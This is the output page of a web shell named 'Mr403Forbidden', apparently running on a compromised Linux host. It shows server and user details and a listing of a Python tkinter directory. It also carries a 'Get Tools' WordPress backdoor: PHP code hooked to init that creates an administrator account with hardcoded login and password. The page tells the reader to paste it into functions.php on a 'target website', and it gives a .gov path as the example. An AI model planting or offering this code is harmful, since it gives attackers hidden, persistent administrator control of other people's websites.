./Mr403Forbidden

:/usr/lib64/python3.11/tkinter/ [ drwxr-xr-x ]

System: Linux 94.45.167.72.host.secureserver.net 4.18.0-553.120.1.el8_10.x86_64 #1 SMP Mon Apr 20 18:04:27 EDT 2026 x86_64
Software: Apache
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 104.21.39.121
Your IP: 216.73.216.87
User: godevadmin (1035) | Group: godevadmin (1013)
Safe Mode: OFF
MYSQL: OFF | PERL: OFF | PYTHON: OFF | WGET: OFF | CURL: ON | GCC: OFF | PKEXEC: OFF
Disable Function:
exec,passthru,shell_exec,system

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = '[email protected]';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
__pycache__ dir 2026-04-29 2:24 - root/root drwxr-xr-x
__init__.py file 2025-06-03 18:38 168.75 KB root/root -rw-r--r--
__main__.py file 2025-06-03 18:38 148 B root/root -rw-r--r--
colorchooser.py file 2025-06-03 18:38 2.6 KB root/root -rw-r--r--
commondialog.py file 2025-06-03 18:38 1.27 KB root/root -rw-r--r--
constants.py file 2025-06-03 18:38 1.46 KB root/root -rw-r--r--
dialog.py file 2025-06-03 18:38 1.5 KB root/root -rw-r--r--
dnd.py file 2025-06-03 18:38 11.37 KB root/root -rw-r--r--
filedialog.py file 2025-06-03 18:38 14.6 KB root/root -rw-r--r--
font.py file 2025-06-03 18:38 6.84 KB root/root -rw-r--r--
messagebox.py file 2025-06-03 18:38 3.77 KB root/root -rw-r--r--
scrolledtext.py file 2025-06-03 18:38 1.77 KB root/root -rw-r--r--
simpledialog.py file 2025-06-03 18:38 11.48 KB root/root -rw-r--r--
tix.py file 2025-06-03 18:38 75.23 KB root/root -rw-r--r--
ttk.py file 2025-06-03 18:38 54.92 KB root/root -rw-r--r--

© ./Mr403Forbidden